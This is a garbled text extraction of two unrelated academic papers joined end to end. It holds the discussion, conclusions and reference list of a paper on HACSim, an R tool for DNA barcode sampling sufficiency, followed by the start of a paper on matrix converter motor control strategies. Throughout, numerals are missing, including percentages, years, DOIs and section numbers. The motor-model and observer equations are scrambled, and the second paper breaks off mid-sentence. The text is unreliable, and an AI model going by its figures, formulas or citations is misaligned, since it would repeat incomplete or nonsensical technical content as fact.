methods by experienced r programmers in the space of dna-based taxonomic identification, seems bright. potential extensions of our algorithm include support for the exploration of genetic variation at the barcode index number (bin) level (ratnasingham & hebert, ), as well as high-throughput sequencing (hts) data for metabarcoding and environmental dna (edna) applications. such capabilities are likely to be challenging to implement at this stage until robust operational taxonomic unit (otu) clustering algorithms are developed (preferably in r). one promising tool in this regard for barcoding of bulk samples of real species and mock communities of known species composition is jamp (just another metabarcoding pipeline) devised for use in r by elbrecht and colleagues (elbrecht et al., ). jamp includes a sequence read denoising tool that can be used to obtain haplotype numbers and frequency information (h* and probs). however, because jamp relies phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. on third-party software (particularly usearch (edgar, ) and vsearch (rognes et al., )), it cannot be integrated within hacsim itself and will thus have to be used externally. in extending hacsim to next-generation space, two issues arise. first, it is not immediately clear how the argument n , is to be handled since multiple reads could be associated with single individuals. that is, unlike in traditional sanger-based sequencing, there is not a one-to-one correspondence between specimen and sequence (wares & pappalardo, ; adams et al., ). second, obtaining reliable haplotype information from noisy hts datasets is challenging without first having strict quality filtering criteria in place to minimize the occurrence of rare, low-copy sequence variants which may reflect artifacts stemming from the polymerase chain reaction (pcr) amplification step or sequencing process (elbrecht et al., ; braukmann et al., ; turon et al., ). turning to molecular population genetics theory might be the answer (adams et al., ). wares & pappalardo ( ) suggest three different approaches to estimating the number of specimens of a species that may have contributed to a metabarcoding sample: ( ) use of prior estimates of haplotype diversity, together with observed number of haplotypes; ( ) usage of ewens’ sampling formula (ewens, ) along with estimates of watterson’s θ (not to be confused with the θ denoting true sampling sufficency herein) (watterson, ), as well as total number of sampled haplotypes; and ( ) employment of an estimate of θ and the number of observed variable sites (s) within a multiple sequence alignment. a direct solution we propose might be to use sequencing coverage/depth (i.e., the number of sequence reads) as a proxy for number of individuals. the outcome of this would be an estimate of the mean/total number of sequece reads required for maximal haplotype recovery. however, the use of read count as a stand-in for number of specimens sampled would require the unrealistic assumption that all individuals (i.e., both alive and dead) shed dna into their environment at equal rates. the obvious issue with extending hacsim to handle hts data is computing power, as such data typically consists of millions of reads spanning multiple gigabytes of computer memory. summary here, we introduced a new statistical approach to assess specimen sampling depth within species based on existing gene marker variation found in public sequence databanks such as bold and genbank. hacsim is both computationally efficient and easy to use. we show utility of our proposed algorithm through both hypothetical and real species genomic sequence data. for real species (here, lake whitefish, deer tick and scalloped hammerhead), results from hacsim suggest that comprehensive sampling for species comprising large barcode libraries within bold, such as actinopterygii, arachnida and elasmobranchii is far from complete. with the availability of hacsim, appropriate sampling guidelines based on the amount of potential error one is willing to tolerate can now be established. for the purpose of addressing basic questions in biodiversity science, the employment of small taxon sample sizes may be adequate; however, this is not the case for regulatory applications, where greater than % coverage of intraspecific haplotype variation is needed to provide high confidence in sequence matches defensible in a court of law. phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of immediate interest is the application of our method to other ray-finned fishes, as well as other species from deeply inventoried taxonomic groups such as elasmobranchii (e.g., sharks), insecta (e.g., lepidoptera, culicidae (mosquitoes)), arachnida (e.g., ticks) and chiroptera (bats) that are of high conservation, medical and/or socioeconomic importance. although we explicitly demonstrate the use of hacsim through employing coi, it would be interesting to extend usage to other barcode markers such as the ribulose- , -bisphosphate carboxylase/oxygenase large subunit (rbcl) and maturase k (matk) chloroplast genes for land plants, as well as the nuclear internal transcribed spacer (its) marker regions for fungi. the application of our method to non-barcode genes routinely employed in specimen identification like mitochondrial cytochrome b (cytb) in birds for instance (baker, sendra tavares & elbourne, ; lavinia et al., ), nuclear rhodopsin (rho) for marine fishes (hanner et al., ) or the phosphoenolpyruvate carboxykinase (pepck) nuclear gene for bumblebees (williams et al., ) is also likely to yield interesting results since sequencing numerous individuals at several different genomic markers can often reveal evolutionary patterns not otherwise seen from employing a single-gene approach (e.g., resolution of cryptic species or confirmation/revision of established taxonomic placements) (williams et al., ). while it is reasonable that hacsim can be applied to genomic regions besides ′-coi, careful consideration of varying rates of molecular evolution within rapidly-evolving gene markers and the effect on downsteam inferences is paramount, as is sequence quality. previous work in plants (genus: taxus) by liu et al. ( ) has found evidence of a correlation between mutation rate and required specimen sampling depth: genes evolving at faster rates will likely require larger sample sizes to estimate haplotype diversity compared to slowly-evolving genomic loci. we simply focused on ′-coi because it is by far the most widely sequenced mitochondrial locus for specimen identification, owing to its desirable biological properties as a dna barcode for animal taxa and because it has an associated data standard to help filter out poor-quality data. (phillips, gillis & hanner, ). however, it should be noted that species diagnosis using coi and other barcode markers is not without its challenges. while coi accumulates variation at an appreciable rate, certain taxonomic groups are not readily distinguished on the basis of their dna barcodes (e.g., the so-called ‘‘problem children’’, such as cnidaria, which tend to lack adequate sequence divergence (bucklin, steinke & blanco-bercial, )). other taxa, like mollusca, are known to harbour indel mutations (layton, martel & hebert, ). introns within fungi greatly complicate sequence alignment (min & hickey, ). thus, users of hacsim must exercise caution in interpreting end results with other markers, particularly those which are not protein-coding. it is necessary to consider the importance of sampling sufficiency as it pertains to the myriad regulatory applications of specimen identification established using dna barcoding (e.g., combatting food fraud) in recent years. it since has become apparent that the success of such endeavours is complicated by the ever-evolving state of public reference sequence libraries such as those found within bold, in addition to the the inclusion of questionable sequences and lack of sufficent metadata for validation purposes in other genomic databases like genbank (e.g., harris ( )). dynamic dna-based identification phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. systems may produce multiple conflicting hits to otherwise corresponding submissions over time. this unwanted behaviour has led to a number of regulatory agencies creating their own static repositories populated with expertly-identified sequence records tied to known voucher specimens deemed fit-for-purpose for molecular species diagnosis and forensic compliance (e.g., the united states food and drug administration (usfda)’s reference standard sequence library (rssl) employed to identify unknown seafood samples from species of high socioeconomic value). while such a move has partially solved the problem of dynamism inherent in global sequence databases, there still remains the issue of low sample sizes that can greatly inflate the perception of barcode gaps between species. obtaining adequate representation of standing genetic variation, both within and between species, is therefore essential to mitigating false assignments using dna barcodes. to this end, we propose the use of hacsim to assess the degree of saturation of haplotype accumulation curves to aid regulatory scientists in rapidly and reliably projecting likely sufficient specimen sample sizes required for accurate matching of unknown queries to known linnean names. a defining characteristic of hacsim is its convergence behaviour: the method converges to the desired level of haplotype recovery p for any initial guess n specified by the user. based on examples explored herein, it appears likely that already-sampled species within repositories like bold are far from being fully characterized on the basis of existing haplotype variation. in addition to this, it is important to consider the current limitations of our algorithm. we can think of only one: it must be stressed that appropriate sample size trajectories are not possible for species with only single representatives within public dna sequence databases because haplotype accumulation is unachievable with only one dna sequence and/or a single sampled haplotype. hence, hacsim can only be applied to species with at least two sampled specimens. thus, application of our method to assess necessary sample sizes for full capture of extant haplotype variation in exceedingly rare or highly elusive taxa is not feasible. despite this, we feel that hacsim can greatly aid in accurate and rapid barcode library construction necessary to thoroughly appreciate the diversity of life on earth. conclusions herein, a new, easy-to-use r package was presented that can be employed to estimate intraspecific sample sizes for studies of genetic diversity assessment, with a particular focus on animal dna barcoding using the coi gene. hacsim employs a novel nonparametric stochastic iterative extrapolation algorithm with good convergence properties to generate haplotype accumulation curves. because our approach treats species’ haplotypes as numeric labels, any genomic locus can be targeted to probe levels of standing genetic variation within multicellular taxa. however, we stress that users must exercise care when dealing with sequence data from non-coding regions of the genome, since these are likely to comprise sequence artifacts such as indels and introns, which can both hinder successful sequence alignment and lead to overestimation of existing haplotype variation within species. the application of our method to assess likely required sample sizes for both phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. hypothetical and real species produced promising results. we argue the use of hacsim will be of broad interest in both academic and industry settings, most notably, regulatory agencies such as the canadian food inspection agency (cfia), agriculture and agri-food canada (aafc), united states department of agriculture (usda), public health agency of canada (phac) and the usfda. while hacsim is an ideal tool for the analysis of sanger sequencing reads, an obvious next step is to extend usability to next-generation sequencing (ngs), especially hts applications. with these elements in place, even the full integration of hacsim to assess comprehensiveness of taxon sampling within large sequence databases such as bold seems like a reality in the near future. acknowledgements the authors wish to extend thanks to robert (rob) young for helpful discussions and providing critical feedback on an earlier draft of this manuscript that greatly improved its flow and overall readability. we acknowledge that the university of guelph resides on the ancestral lands of the attawandaron people and the treaty lands and territory of the mississaugas of the credit. we recognize the significance of the dish with one spoon covenant to this land and offer our respect to our anishinaabe, haudenosaunee and métis neighbours as we strive to strengthen our relationships with them. additional information and declarations funding this work was supported by the college of physical and engineering science (cpes) graduate excellence entrance scholarship to jarrett d. phillips. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: college of physical and engineering science (cpes) graduate excellence entrance scholarship. competing interests the authors declare there are no competing interests. author contributions • jarrett d. phillips conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • steven h. french conceived and designed the experiments, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • robert h. hanner and daniel j. gillis conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: the aligned and trimmed dna barcodes are available at figshare: phillips, jarrett ( ): coregonus clupeaformis ′-coi dna barcode sequences. figshare. dataset. . /m .figshare. .v . phillips, jarrett ( ): ixodes scapularis ′-coi dna barcode sequences. figshare. dataset. . /m .figshare. .v . phillips, jarrett ( ): sphyrna lewini ′-coi dna barcode sequences. figshare. dataset. . /m .figshare. .v . a stable version of the algorithm is available on github: https://github.com/jphill / hacsim.r, along with a detailed readme on how to run code. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references adams c, knapp m, gemmell n, jeunen g-j, bunce m, lamare m, taylor h. . beyond biodiversity: can environmental dna (edna) cut it as a population genetics tool genes ( ): – doi . /genes . april j, hanner rh, dion-côté a-m, bernatchez l. a. glacial cycles as an allopatric speciation pump in north-eastern american freshwater fishes. molecular ecology ( ): – doi . /mec. . april j, hanner rh, mayden rl, bernatchez l. b. metabolic rate and climatic fluctuations shape continental wide pattern of genetic divergence and biodiversity in fishes. plos one ( ):e doi . /journal.pone. . april j, mayden rl, hanner rh, bernatchez l. . genetic calibration of species diversity among north america’s freshwater fishes. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . baker a, sendra tavares e, elbourne r. . countering criticisms of single mito- chondrial dna gene barcoding in birds. molecular ecology resources (s ): – doi . /j. - . . .x. bergsten j, bilton dt, fujisawa t, elliott m, monaghan mt, balke m, hendrich l, geijer j, herrmann j, foster gn, i r, nilsson a, barraclough t, vogler a. . the effect of geographical scale of sampling on dna barcoding. systematic biology ( ): – . braukmann t, ivanova n, prosser s, elbrecht v, steinke d, ratnasingham s, de waard j, sones j, zakharov e, hebert p. . metabarcoding a diverse arthropod mock community. molecular ecology resources ( ): – . brown sd, collins ra, boyer s, lefort m-c, malumbres-olarte j, vink cj, cruick- shank rh. . spider: an r package for the analysis of species identity and phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. .v https://doi.org/ . /m .figshare. .v https://doi.org/ . /m .figshare. .v https://github.com/jphill /hacsim.r https://github.com/jphill /hacsim.r http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /genes http://dx.doi.org/ . /mec. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /peerj-cs. evolution, with particular reference to dna barcoding. molecular ecology resources ( ): – doi . /j. - . . .x. bucklin a, steinke d, blanco-bercial l. . dna barcoding of marine metazoa. annual review of marine science : – doi . /annurev-marine- - . cameron s, rubinoff d, will k. . who will actually use dna barcoding and what will it cost systematic biology ( ): – doi . / . Čandek k, kuntner m. . dna barcoding gap: reliable species identification over morphological and geographical scales. molecular ecology resources ( ): – doi . / - . . casella g, berger r. . statistical inference. california: duxbury thomson learning. ceballos g, ehrlich pr, barnosky ad, garcía a, pringle rm, palmer tm. . accel- erated modern human–induced species losses: entering the sixth mass extinction. science advances ( ):e doi . /sciadv. . chao a. . nonparametric estimation of the number of classes in a population. scandinavian journal of statistics : – . collins r, cruickshank r. . the seven deadly sins of dna barcoding. molecular ecology resources ( ): – doi . / - . . dasmahapatra kk, elias m, hill ri, hoffman ji, mallet j. . mitochondrial dna barcoding detects some species that are real, and some that are not. molecular ecology resources ( ): – doi . /j. - . . .x. eddelbuettel d, françois r. . rcpp: seamless r and c++ integration. journal of statistical software ( ): – doi . /jss.v .i . eddelbuettel d, sanderson c. . rcpparmadillo: accelerating r with high- performance c++ linear algebra. computational statistics and data analysis : – doi . /j.csda. . . . edgar rc. . search and clustering orders of magnitude faster than blast. bioinfor- matics ( ): – doi . /bioinformatics/btq . efron b. . bootstrap methods: another look at the jackknife. the annals of statistics ( ): – . elbrecht v, vamos ee, steinke d, leese f. . estimating intraspecific ge- netic diversity from community dna metabarcoding data. peerj :e doi . /peerj. . ewens wj. . the sampling theory of selectively neutral alleles. theoretical population biology ( ): – doi . / - ( ) - . ezard t, fujisawa t, barraclough t. . splits: species’ limits by threshold statistics. r package version . - /r . available at https://r-forge.r-project.org/projects/splits/ . fujisawa t, barraclough t. . delimiting species using single-locus data and the generalized mixed yule coalescent approach: a revised method and evaluation on simulated data sets. systematic biology ( ): – doi . /sysbio/syt . goodall-copestake w, tarling g, murphy e. . on the comparison of population- level estimates of haplotype and nucleotide diversity: a case study using the gene cox in animals. heredity ( ): – doi . /hdy. . . phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /annurev-marine- - http://dx.doi.org/ . / http://dx.doi.org/ . / - . http://dx.doi.org/ . /sciadv. http://dx.doi.org/ . / - . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /jss.v .i http://dx.doi.org/ . /j.csda. . . http://dx.doi.org/ . /bioinformatics/btq http://dx.doi.org/ . /peerj. http://dx.doi.org/ . / - ( ) - https://r-forge.r-project.org/projects/splits/ http://dx.doi.org/ . /sysbio/syt http://dx.doi.org/ . /hdy. . http://dx.doi.org/ . /peerj-cs. gwiazdowski ra, elkinton js, dewaard jr, sremac m. . phylogeographic diversity of the winter moths operophtera brumata and o. bruceata (lepidoptera: geometri- dae) in europe and north america. annals of the entomological society of america ( ): – doi . /an . hanner r. . data standards for barcode records in insdc (bris). university of guelph. hanner r, floyd r, bernard a, collette bb, shivji m. . dna barcoding of billfishes. mitochondrial dna (sup ): – doi . / . . . hanner rh, naaum am, shivji ms. . conclusion: dna-based authentication of shark products and implications for conservation and management. in: naaum am, hanner rh, eds. seafood authenticity and traceability: a dna-based perspective. st edition. california, massachusetts, oxford: academic press. harris dj. . can you bank on genbank trends in ecology & evolution ( ): – doi . /s - ( ) - . hebert pd, cywinska a, ball sl, dewaard j. . biological identifications through dna barcodes. proceedings of the royal society of london b: biological sciences ( ): – doi . /rspb. . . hebert pd, ratnasingham s, de waard jr. . barcoding animal life: cytochrome c oxidase subunit divergences among closely related species. proceedings of the royal society of london b: biological sciences (suppl ):s –s . hebert pd, stoeckle my, zemlak ts, francis cm. . identification of birds through dna barcodes. plos biology ( ):e doi . /journal.pbio. . hickerson mj, meyer cp, moritz c. . dna barcoding will often fail to discover new animal species over broad parameter space. systematic biology ( ): – doi . / . hubert n, hanner r, holm e, mandrak ne, taylor e, burridge m, watkinson d, dumont p, curry a, bentzen p, zhang j, april j, bernatchez l. . identifying canadian freshwater fishes through dna barcodes. plos one ( ):e doi . /journal.pone. . jin q, he l-j, zhang a-b. . a simple d non-parametric resampling statistical approach to assess confidence in species identification in dna barcoding—an alternative to likelihood and bayesian approaches. plos one ( ):e doi . /journal.pone. . kimura m, weiss g. . the stepping stone model of population structure and the decrease of genetic correlation with distance. genetics ( ): – . kumar s, stecher g, tamura k. . mega : molecular evolutionary genetics analysis version . for bigger datasets. molecular biology and evolution ( ): – . lavinia p, kerr k, tubaro p, hebert p, lijtmaer d. . calibrating the molecular clock beyond cytochrome b: assessing the evolutionary rate of coi in birds. journal of avian biology ( ): – doi . /jav. . layton k, martel a, hebert p. . patterns of dna barcode variation in canadian marine molluscs. plos one ( ):e doi . /journal.pone. . phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /an http://dx.doi.org/ . / . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /rspb. . http://dx.doi.org/ . /journal.pbio. http://dx.doi.org/ . / http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /jav. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. liu j, provan j, gao l-m, li d-z. . sampling strategy and potential utility of indels for dna barcoding of closely related plant species: a case study in taxus. interna- tional journal of molecular sciences ( ): – doi . /ijms . luo a, lan h, ling c, zhang a-b, shi l, ho sy, zhu c. . a simulation study of sample size for dna barcoding. ecology and evolution ( ): – doi . /ece . . matz mv, nielsen r. . a likelihood ratio test for species membership based on dna sequence data. philosophical transactions of the royal society of london b: biological sciences ( ): – doi . /rstb. . . meyer cp, paulay g. . dna barcoding: error rates based on comprehensive sampling. plos biology ( ):e doi . /journal.pbio. . min x, hickey d. . assessing the effect of varying sequence length on dna barcod- ing of fungi. molecular ecology notes : – doi . /j. - . . .x. monaghan m, wild r, elliot m, fujisawa t, balke m, inward d, lees d, ranaivosolo r, eggleton p, barraclough t, vogler a. . accelerated species inventory on madagascar using coalescent-based models of species delineation. systematic biology ( ): – doi . /sysbio/syp . nielsen r, matz m. . statistical approaches for dna barcoding. systematic biology ( ): – doi . / . ondrejicka da, locke sa, morey k, borisenko av, hanner rh. . status and prospects of dna barcoding in medically important parasites and vectors. trends in parasitology ( ): – doi . /j.pt. . . . ondrejicka da, morey k, hanner rh. . dna barcodes identify medically impor- tant tick species in canada. genome ( ): – doi . /gen- - . overdyk lm, braid he, crawford ss, hanner rh. . extending dna barcoding coverage for lake whitefish (coregonus clupeaformis) across the three major basins of lake huron. dna barcodes ( ): – . paradis e. . pegas: an r package for population genetics with an integrated— modular approach. bioinformatics ( ): – doi . /bioinformatics/btp . paradis e, claude j, strimmer k. . ape: analyses of phylogenetics and evolution in r language. bioinformatics ( ): – doi . /bioinformatics/btg . pearson k. . contributions to the mathematical theory of evolution. philosophical transactions of the royal society of london. a : – doi . /rsta. . . phillips jd, gillis dj, hanner rh. . incomplete estimates of genetic diversity within species: implications for dna barcoding. ecology and evolution ( ): – doi . /ece . . phillips jd, gwiazdowski ra, ashlock d, hanner r. . an exploration of sufficient sampling effort to describe intraspecific dna barcode haplotype diversity: examples from the ray–finned fishes (chordata: actinopterygii). dna barcodes ( ): – . pons j, barraclough t, gomez-zurita j, cardoso a, duran d, hazell s, kamoun s, sumlin w, vogler a. . sequence-based species delimitation for the phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ijms http://dx.doi.org/ . /ece . http://dx.doi.org/ . /rstb. . http://dx.doi.org/ . /journal.pbio. http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /sysbio/syp http://dx.doi.org/ . / http://dx.doi.org/ . /j.pt. . . http://dx.doi.org/ . /gen- - http://dx.doi.org/ . /bioinformatics/btp http://dx.doi.org/ . /bioinformatics/btg http://dx.doi.org/ . /rsta. . http://dx.doi.org/ . /ece . http://dx.doi.org/ . /peerj-cs. dna taxonomy of undescribed insects. systematic biology ( ): – doi . / . puillandre n, lambert a, brouillet s. . abgd, automatic barcode gap discovery for primary species delimitation. molecular ecology : – . r core team. . r: a language and environment for statistical computing. vienna: r foundation for statistical computing. available at https://www.r-project.org/ . ratnasingham s, hebert pd. . bold: the barcode of life data system (http://www.barcodinglife.org). molecular ecology notes ( ): – doi . /j. - . . .x. ratnasingham s, hebert pd. . a dna-based registry for all animal species: the barcode index number (bin) system. plos one ( ):e doi . /journal.pone. . rognes t, flouri t, nichols b, quince c, mahé f. . vsearch: a versatile open source tool for metagenomics. peerj :e doi . /peerj. . ross ha, murugan s, li wls. . testing the reliability of genetic methods of species identification via simulation. systematic biology ( ): – doi . / . ryan k, crawford s. . distribution and abundance of larval lake whitefish (core- gonus clupeaformis) in stokes bay, lake huron. journal of great lakes research : – doi . /j.jglr. . . . spall jc. . stochastic optimization. in: gentle je, härdle wk, mori y, eds. hand- book of computational statistics: concepts and methods. nd edition. heidelberg: springer. stein ed, martinez mc, stiles s, miller pe, zakharov ev. . is dna barcoding actually cheaper and faster than traditional morphological methods: results from a survey of freshwater bioassessment efforts in the united states plos one ( ):e doi . /journal.pone. . steinke d, bernard am, horn rl, hilton p, hanner r, shivji ms. . dna analysis of traded shark fins and mobulid gill plates reveals a high proportion of species of conservation concern. scientific reports ( ): – doi . /s - - -x. turon x, antich a, palacin c, præbel k, wangersteen o. . from metabarcoding to metaphylogeography: separating the wheat from the chaff. biorxiv. ward rd, zemlak ts, innes bh, last pr, hebert pd. . dna barcoding australia’s fish species. philosophical transactions of the royal society of london b: biological sciences ( ): – doi . /rstb. . . wares jp, pappalardo p. . can theory improve the scope of quantitative metazoan metabarcoding? diversity ( ): – doi . /d . watterson g. . on the number of segregating sites in genetical models without recombination. theoretical population biology ( ): – doi . / - ( ) - . wiemers m, fiedler k. . does the dna barcoding gap exist?—a case study in blue butterflies (lepidoptera: lycaenidae). frontiers in zoology ( ): – . phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / https://www.r-project.org/ http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj. http://dx.doi.org/ . / http://dx.doi.org/ . /j.jglr. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /rstb. . http://dx.doi.org/ . /d http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /peerj-cs. williams p, byvaltsev a, cederberg b, berezin m, Ødegaard f, rasmussen c, richardson l, huang j, sheffield c, williams s. . genes suggest ancestral colour polymorphisms are shared across morphologically cryptic species in arctic bumblebees. plos one ( ):e doi . /journal.pone. . wright s. . the genetical structure of populations. annals of eugenics ( ): – . yao p-c, gao h-y, wei y-n, zhang j-h, chen x-y, li h-q. . evaluating sampling strategy for dna barcoding study of coastal and inland halo-tolerant poaceae and chenopodiaceae: a case study for increased sample size. plos one ( ):e doi . /journal.pone. . young r, abott c, therriault t, adamowicz s. . barcode-based species delimitation in the marine realm: a test using hexanauplia (multicrustacea: thecostraca and copepoda). genome ( ): – doi . /gen- - . zhang a-b, he l-j, crozier rh, muster c, zhu c-d. . estimating sample sizes for dna barcoding. molecular phylogenetics and evolution ( ): – doi . /j.ympev. . . . zhang j, kapli p, pavlidis p, stamatakis p. . a general species delimitation method with applications to phylogenetic placements. bioinformatics ( ): – doi . /bioinformatics/btt . phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /gen- - http://dx.doi.org/ . /j.ympev. . . http://dx.doi.org/ . /bioinformatics/btt http://dx.doi.org/ . /peerj-cs. paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - research on control strategy of matrix converter motor system xu shuping school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com chang yichen school of computer science and engineering xi’an technological university xi’an, , china su xiaohui school of computer science and engineering xi’an technological university xi’an, , china guo yu school of computer science and engineering xi’an technological university xi’an, , china abstract—in order to solve the problem of the industrial application of matrix converter (mc), the matrix converter motor system (mcms) is proposed. the control strategies of mcms are studied based on the control of mc and the motor. the effects of voltage vector and direct torque control are analyzed. the simulation result show the disadvantages of usual means can be conquered by new means and it can obtain more high accuracy and robustness. the dynamic and static performances of direct torque control based on it are better than that of conventional direct toque control. the new ameliorated control strategy is proposed. keywords-matrix converter; vvvf control; vector control; direct torque control i. introduction matrix converter output frequency is independent of input frequency limits, no dc link, small size, compact structure, good quality of input / output current, input power factor adjustable, and can be achieved two-way flow of energy. it is in line with the ideal standard of electric drive and expected to become the mainstream technology of future electric transmission[ - ]. the biggest obstacle of hinder matrix converter access to industrial application is low voltage transfer. in the line shape modulation, the maximum of voltage transfer ratio of matrix converter is . [ - ]. therefore, scholars have proposed various solutions. matrix converter motor system is a combination of both matrix converter and motor, so control strategy is also a combination of matrix converter and motor control method. this paper proposed the concept of matrix converter motor system aimed at the problems of matrix converter enter into industrial applications, and researched the control strategy of matrix converter motor system combined with matrix converter control method and the motor speed method. ii. matrix converter motor system matrix converter motor system is composed of matrix converter, matrix converter motor, input filter, clamp circuit and other components shown in figure . in which, the rated magnetic flux of matrix converter motor design based on the maximum voltage transfer ratio of . of matrix converter to meet the requirements of matrix converter voltage transfer ratio and take into account the integration issues with the matrix converter. in order to filter the high harmonic in input current caused by the switch frequency, matrix converter motor system needs to set the input filter. view from the power side of the matrix converter is a current source, so a lc second order filter circuit adopted, the design criteria of lc input filter as follows: cutoff frequency of input filter should be lower than the switch frequency; the power factor angle offset caused by the filter should be minimum under the minimum output power set; a certain voltage and electric resistance, minimize size or weight of the input filter by selecting capacitors with different power density; at rated international journal of advanced network, monitoring and controls volume , no. , current, the voltage caused by filter inductor should be drop the minimum to reduce adverse effects to voltage transfer ratio. m ~ s s s s s s s s s s mains filter convertermatrix circuit clamp otorinductionm fg l m l   dc c r vt f c figure . the topology of the matrix converter motor system iii. matrix converter control strategies and motor control strategies three-phase / three phase matrix converter consists of two-way switches. two basic principles of matrix converter control strategies as follows: two input phase can not be connected meanwhile to an output phases to prevent short circuits; any output phase must ensure that an input is linked in order to prevent inductive load open circuit. constraints in the above principles, matrix converter has a total of switch states. matrix converter control strategy has switch function method, dual-voltage vector method, space vector modulation method and hysteresis current tracking method. switching function method is calculated the duty cycle of switches by the relationship between the actual inputs of inverter and the input requirements[ ]. dual voltage synthesis method is in each switching cycle, used linear combinations of the two input lines voltage to synthesize output line voltage of two phase law[ ]. space vector modulation method is based on the virtual dc link ideas, the matrix converter is equivalent to the dual pwm converter of abolition dc link, and used space vector modulation to both rectifier link and inverter link which equivalent ac - dc - ac structure, and then back to matrix converter[ ]. hysteresis current tracking method use hysteresis track on the output current to track the reference current[ ]. motor control strategy has vvvf control, vector control and direct torque control. through the speed regulator, vvvf control can achieve closed loop of speed; vector control to achieve double closed loop of rotate speed and torque component of stator current, in which rotate spend loop is the outer ring, torque component of stator current for the inner ring; direct torque control achieve double-loop of speed and torque; where speed loop for the outer ring, the torque for the inner ring. iv. mathematical model of pmsm for the vectors relationship between flux voltage and current in permanent magnet synchronous motor, d, q coordinate system fixed in the rotor coordinate system; x, y coordinate system fixed to the stator rotating coordinate system, stator flux  t qd  , as state vector, stator current t qd iii },{ as output vector, t fqd uuu },,{  as the input vector. so the motor properties model can be rewritten in matrix form as follows:                                                f q d d s q d q s e e d s q d x u u l r l r l r d d                                                   f q d d q d q d q d u u l l l i i    qd  , are the axis flux; qd uu , are the axis voltage. v. the stator flux based on full- dimensional state observer a. structure of stator flux full-dimensional state observer in practice, there is not all state variables can be measured directly, so we can reconstruct state variables by variables can be measure in system to construct a system identical to the original artificially system. the system is constructed artificially, so its state variables can be measured completely. construction system:           sss sss duci bua   international journal of advanced network, monitoring and controls volume , no. ,  s  is the state vector for estimated value of s  which original system actual vector need to observe.                q s e e d s l r l r a   ,          d s l r b              q d l l c ,           d ld t sqsds          ,  tfsqsds uuu  ,  t sqsds iii  so: )(    ssss a  solution:         ) () ( ss at ss e  known by the above equation: when ) () (   ss  , that ss    . however, in general, to ensure initial conditions identical at any time is impossible. therefore, in order to eliminate state error, we can introduce error feedback )(   ss  according to the basic principles of control theory, that is, error feedback )(   ss ii . the advantages of introduces feedback terms as follows: firstly, when the initial state s  and  s  have a deviation, it can control the deviation not diffusion or shock with time increase; secondly, it can overcome the shortcomings of the open-loop observer can not be adjusted when matrix a changes that made the deviations of s  and  s  more worse. the state estimation error of observer can be obtained from figure is ( )ˆ ˆe [ ( ) ( )]t s s s s     a gc ψ ψ ψ ψ . clearly, as long as the eigenvalues of coefficients (a gc) of chosen observer all have negative real parts, it can make state estimated value ˆ s ψ incremental approach to the real value s ψ . b. pole placement the pole of observer is the eigenvalues of )( gca  which is important to observer performance. usually pole placement of observer should make the response speed of observer faster than the system model. that can make the observation error fast convergence. to get the eigenvalues of )( gca  , this paper used induction motor pole configuration method in documents, that is the method of pole placement of observer configured direct proportional to motor model. consider the poles of motor, that is, the eigenvalues of  asi that eigenvalues of the following formula: )(  e q s d s q s d s l r l r s l r l r s  two poles can be got: )( )()( e q s d s q s d s q s d s l r l r l r l r l r l r s   )( )()( e q s d s q s d s q s d s l r l r l r l r l r l r s   ( j ) set observer poles is k times than motor poles, that is, ·os k s ·os k s the position of the motor poles and observer’s poles k = . in the article. using the powerful scientific computing advantages of matlab and control system toolbox, according to the robust pole assignment algorithm and equation, the gain matrix of the observer g can be solved. among them, p is the desired observer pole vector. ( ) 'placeg a', c', p vi. control strategy of matrix converter motor system control strategy of matrix converter motor system is essentially a combination of matrix converter control and motor control. a. matrix converter space vector and motor vvvf control the current study generally is matrix converter space vector and motor vvvf control. vvvf control obtained the amplitude and frequency of reference international journal of advanced network, monitoring and controls volume , no. , output voltage, matrix converter space vector modulation of matrix converter achieved input power factor correction and output voltage generation. this only on the speed closed-loop, it can not meet the speed requirements of high-performance motor system. because in the space vector modulation, the duty cycle calculation is 